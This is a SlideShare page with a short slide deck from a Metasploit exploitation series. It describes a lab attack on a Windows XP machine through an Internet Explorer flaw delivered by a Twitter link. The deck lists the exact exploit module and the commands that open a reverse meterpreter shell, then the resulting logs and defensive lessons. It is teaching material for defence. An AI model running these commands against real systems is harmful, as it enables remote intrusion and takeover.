SlideShare a Scribd company logo

Metasploit Exploitation Scenarios -EN : Scenario 1

Download as KEY, PDF
Eric Romang
Eric Romang

First part of the Metasploit Exploitation Scenarios serie

Technology
1 of 7
Metasploit Scenarios Scenario 1 Http:://eromang.zataz.com - Http://twitter.com/eromang
Scenario 1 : Topology Target Firewall Attacker Gateway 192.168.111.0/24 192.168.178.0/24 Target : - Windows XP SP3 - User has an admin profile - IP : 192.168.111.129 - Default gateway : 192.168.111.128 - No anti-virus / Local Windows Firewall activated - Vulnerable to MS11-03 Firewall Gateway : - Eth0 : 192.168.111.128 (internal interface) - Eth1 : 192.168.178.59 (external interface) Attacker : - IP : 192.168.178.21
Scenario 1 : Firewall rules • Firewall administration by SSH only from internal network • Internal network is allowed to request «Any» protocols to external network
Scenario 1 : Story-Board ✤ This network topology is corresponding to most of broadband ADSL Internet connexions for home users, and SMB. ✤ Attacker send a Twitter message to the target. The message contain a malicious URL (could be shortened) in order to exploit Internet Explorer MS11-03 vulnerability. ✤ The target click on the provided link and MS11-03 is exploited. ✤ After the exploitation a reverse_tcp meterpreter payload, on port 4444/TCP, is launched. ✤ No further post-exploitations
Scenario 1 : Metasploit commands use exploit/windows/browser/ms11_003_ie_css_import set SRVHOST 192.168.178.21 set SRVPORT 80 set URIPATH /readme.html set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit sysinfo ipconfig route getuid
Scenario 1 : Evidences Internet Explorer process is created : A new process has been created: New Process ID: 3200 Image File Name: C:Program FilesInternet Exploreriexplore.exe Creator Process ID: 2224 User Name: romang Domain: ERIC-FD2123B3C5 Logon ID: (0x0,0x62764) Internet Explorer process create a new «notepad.exe» process : A new process has been created: New Process ID: 3972 Image File Name: C:WINDOWSsystem32notepad.exe Creator Process ID: 3200 User Name: romang Domain: ERIC-FD2123B3C5 Logon ID: (0x0,0x62764) Logs on the Firewall Gateway Feb 21 15:31:52 fw1 kernel: [18410.843231] RULE 5 -- ACCEPT IN=eth0 OUT=eth1 SRC=192.168.111.129 DST=192.168.178.21 LEN=48 TOS=0x00 PREC=0x00 TTL=127 ID=2845 DF PROTO=TCP SPT=1078 DPT=4444 WINDOW=64240 RES=0x00 SYN URGP=0
Scenario 1 : Leasons Learned •Update your OS and applications ! •Don’t run applications with administrator privileges ! •Never click on unknown links, specialy shortened URL’s, from unknown sources ! •Install an antivirus and don’t trust him :) •Don’t trust your Firewalls (Local or remote) ! •Don’t allow «Any» outbound protocols connexions from your internal network to untrusted networks ! Limit your outbound connexions to your real needs. 7

Recommended

Metasploit Exploitation Scenarios -EN : Scenario 2
Metasploit Exploitation Scenarios -EN : Scenario 2Metasploit Exploitation Scenarios -EN : Scenario 2
Metasploit Exploitation Scenarios -EN : Scenario 2Eric Romang
 
Optix Pro Bo2 K Trojan
Optix Pro Bo2 K TrojanOptix Pro Bo2 K Trojan
Optix Pro Bo2 K TrojanShinra
 
Cybersecurity Essentials - Part 1
Cybersecurity Essentials - Part 1Cybersecurity Essentials - Part 1
Cybersecurity Essentials - Part 1Shobhit Sharma
 
Windows xp compromise and remedies
Windows xp compromise and remediesWindows xp compromise and remedies
Windows xp compromise and remediesBikrant Gautam
 
Leeme
LeemeLeeme
LeemeJohan Vasco
 
Disabling Ports 135 and 445 to protect the Road Warrior
Disabling Ports 135 and 445 to protect the Road WarriorDisabling Ports 135 and 445 to protect the Road Warrior
Disabling Ports 135 and 445 to protect the Road WarriorDavid Sweigert
 
Detecting hardware keyloggers
Detecting hardware keyloggersDetecting hardware keyloggers
Detecting hardware keyloggersmihailowitsch
 
Backdoor
BackdoorBackdoor
Backdoorphanleson
 

Recommended

Metasploit Exploitation Scenarios -EN : Scenario 2
Metasploit Exploitation Scenarios -EN : Scenario 2Metasploit Exploitation Scenarios -EN : Scenario 2
Metasploit Exploitation Scenarios -EN : Scenario 2Eric Romang
 
Optix Pro Bo2 K Trojan
Optix Pro Bo2 K TrojanOptix Pro Bo2 K Trojan
Optix Pro Bo2 K TrojanShinra
 
Cybersecurity Essentials - Part 1
Cybersecurity Essentials - Part 1Cybersecurity Essentials - Part 1
Cybersecurity Essentials - Part 1Shobhit Sharma
 
Windows xp compromise and remedies
Windows xp compromise and remediesWindows xp compromise and remedies
Windows xp compromise and remediesBikrant Gautam
 
Leeme
LeemeLeeme
LeemeJohan Vasco
 
Disabling Ports 135 and 445 to protect the Road Warrior
Disabling Ports 135 and 445 to protect the Road WarriorDisabling Ports 135 and 445 to protect the Road Warrior
Disabling Ports 135 and 445 to protect the Road WarriorDavid Sweigert
 
Detecting hardware keyloggers
Detecting hardware keyloggersDetecting hardware keyloggers
Detecting hardware keyloggersmihailowitsch
 
Backdoor
BackdoorBackdoor
Backdoorphanleson
 
Embedded government espionage
Embedded government espionageEmbedded government espionage
Embedded government espionageMuts Byte
 
Computer securety
Computer securetyComputer securety
Computer securetyrushil ahmed
 
Cracking wep
Cracking wepCracking wep
Cracking wepPedro Guillén Núñez
 
Hardware key logger
Hardware key loggerHardware key logger
Hardware key loggerTamim1980
 
Remove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virusRemove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virusjesicasruma
 
Conficker
ConfickerConficker
ConfickerBobmathews
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSecurity Scope
 
Symantec Freak Vulnerability Infographic
Symantec Freak Vulnerability InfographicSymantec Freak Vulnerability Infographic
Symantec Freak Vulnerability InfographicSymantec
 
Secure LXC Networking
Secure LXC NetworkingSecure LXC Networking
Secure LXC NetworkingMarian Marinov
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit frameworkLe Quyen
 
Compromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitIOSR Journals
 
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRootedCON
 
Countering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareCountering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareTyler Borosavage
 
Stuxnet dc9723
Stuxnet dc9723Stuxnet dc9723
Stuxnet dc9723Iftach Ian Amit
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicJulia Yu-Chin Cheng
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Final Engagement
Final EngagementFinal Engagement
Final EngagementJefferson Green
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web WorkshopDennis Maldonado
 
Linux router
Linux routerLinux router
Linux routerMiguel E Arellano Quezada
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
 
Stuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackStuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackAjinkya Nikam
 

More Related Content

What's hot

Embedded government espionage
Embedded government espionageEmbedded government espionage
Embedded government espionageMuts Byte
 
Hardware key logger
Hardware key loggerHardware key logger
Hardware key loggerTamim1980
 
Remove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virusRemove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virusjesicasruma
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSecurity Scope
 
Symantec Freak Vulnerability Infographic
Symantec Freak Vulnerability InfographicSymantec Freak Vulnerability Infographic
Symantec Freak Vulnerability InfographicSymantec
 

What's hot (9)

Embedded government espionage
Embedded government espionageEmbedded government espionage
Embedded government espionage
 
Computer securety
Computer securetyComputer securety
Computer securety
 
Cracking wep
Cracking wepCracking wep
Cracking wep
 
Hardware key logger
Hardware key loggerHardware key logger
Hardware key logger
 
Remove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virusRemove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virus
 
Conficker
ConfickerConficker
Conficker
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course Syllabus
 
Symantec Freak Vulnerability Infographic
Symantec Freak Vulnerability InfographicSymantec Freak Vulnerability Infographic
Symantec Freak Vulnerability Infographic
 
Secure LXC Networking
Secure LXC NetworkingSecure LXC Networking
Secure LXC Networking
 

Similar to Metasploit Exploitation Scenarios -EN : Scenario 1

metaploit framework
metaploit frameworkmetaploit framework
metaploit frameworkLe Quyen
 
Compromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitIOSR Journals
 
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRootedCON
 
Countering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareCountering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareTyler Borosavage
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicJulia Yu-Chin Cheng
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web WorkshopDennis Maldonado
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
 
Stuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackStuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackAjinkya Nikam
 
Malwares Malwares Malwares Malwares Malwares
Malwares Malwares Malwares Malwares MalwaresMalwares Malwares Malwares Malwares Malwares
Malwares Malwares Malwares Malwares MalwaresNioLemuelLazatinConc
 
1. inside source IP address and port number 172.16.1.2020translat.pdf
1. inside source IP address and port number 172.16.1.2020translat.pdf1. inside source IP address and port number 172.16.1.2020translat.pdf
1. inside source IP address and port number 172.16.1.2020translat.pdfmeejuhaszjasmynspe52
 
Cisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designsCisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designsManuel Santander
 
Taming botnets
Taming botnetsTaming botnets
Taming botnetsf00d
 
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisLife Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisPositive Hack Days
 

Similar to Metasploit Exploitation Scenarios -EN : Scenario 1 (20)

metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
 
Compromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploit
 
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
 
Countering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareCountering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by Malware
 
Stuxnet dc9723
Stuxnet dc9723Stuxnet dc9723
Stuxnet dc9723
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for public
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
Final Engagement
Final EngagementFinal Engagement
Final Engagement
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web Workshop
 
Linux router
Linux routerLinux router
Linux router
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
 
Stuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackStuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attack
 
Malwares Malwares Malwares Malwares Malwares
Malwares Malwares Malwares Malwares MalwaresMalwares Malwares Malwares Malwares Malwares
Malwares Malwares Malwares Malwares Malwares
 
1. inside source IP address and port number 172.16.1.2020translat.pdf
1. inside source IP address and port number 172.16.1.2020translat.pdf1. inside source IP address and port number 172.16.1.2020translat.pdf
1. inside source IP address and port number 172.16.1.2020translat.pdf
 
STUXNET_
STUXNET_STUXNET_
STUXNET_
 
Cisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designsCisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designs
 
I Heart Stuxnet
I Heart StuxnetI Heart Stuxnet
I Heart Stuxnet
 
Taming botnets
Taming botnetsTaming botnets
Taming botnets
 
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisLife Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
 

Recently uploaded

Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 

Recently uploaded (20)

Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 

Metasploit Exploitation Scenarios -EN : Scenario 1

  • 1. Metasploit Scenarios Scenario 1 Http:://eromang.zataz.com - Http://twitter.com/eromang
  • 2. Scenario 1 : Topology Target Firewall Attacker Gateway 192.168.111.0/24 192.168.178.0/24 Target : - Windows XP SP3 - User has an admin profile - IP : 192.168.111.129 - Default gateway : 192.168.111.128 - No anti-virus / Local Windows Firewall activated - Vulnerable to MS11-03 Firewall Gateway : - Eth0 : 192.168.111.128 (internal interface) - Eth1 : 192.168.178.59 (external interface) Attacker : - IP : 192.168.178.21
  • 3. Scenario 1 : Firewall rules • Firewall administration by SSH only from internal network • Internal network is allowed to request «Any» protocols to external network
  • 4. Scenario 1 : Story-Board ✤ This network topology is corresponding to most of broadband ADSL Internet connexions for home users, and SMB. ✤ Attacker send a Twitter message to the target. The message contain a malicious URL (could be shortened) in order to exploit Internet Explorer MS11-03 vulnerability. ✤ The target click on the provided link and MS11-03 is exploited. ✤ After the exploitation a reverse_tcp meterpreter payload, on port 4444/TCP, is launched. ✤ No further post-exploitations
  • 5. Scenario 1 : Metasploit commands use exploit/windows/browser/ms11_003_ie_css_import set SRVHOST 192.168.178.21 set SRVPORT 80 set URIPATH /readme.html set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit sysinfo ipconfig route getuid
  • 6. Scenario 1 : Evidences Internet Explorer process is created : A new process has been created: New Process ID: 3200 Image File Name: C:Program FilesInternet Exploreriexplore.exe Creator Process ID: 2224 User Name: romang Domain: ERIC-FD2123B3C5 Logon ID: (0x0,0x62764) Internet Explorer process create a new «notepad.exe» process : A new process has been created: New Process ID: 3972 Image File Name: C:WINDOWSsystem32notepad.exe Creator Process ID: 3200 User Name: romang Domain: ERIC-FD2123B3C5 Logon ID: (0x0,0x62764) Logs on the Firewall Gateway Feb 21 15:31:52 fw1 kernel: [18410.843231] RULE 5 -- ACCEPT IN=eth0 OUT=eth1 SRC=192.168.111.129 DST=192.168.178.21 LEN=48 TOS=0x00 PREC=0x00 TTL=127 ID=2845 DF PROTO=TCP SPT=1078 DPT=4444 WINDOW=64240 RES=0x00 SYN URGP=0
  • 7. Scenario 1 : Leasons Learned •Update your OS and applications ! •Don’t run applications with administrator privileges ! •Never click on unknown links, specialy shortened URL’s, from unknown sources ! •Install an antivirus and don’t trust him :) •Don’t trust your Firewalls (Local or remote) ! •Don’t allow «Any» outbound protocols connexions from your internal network to untrusted networks ! Limit your outbound connexions to your real needs. 7

Editor's Notes

  1. \n
  2. \n
  3. \n
  4. \n
  5. \n
  6. \n
  7. \n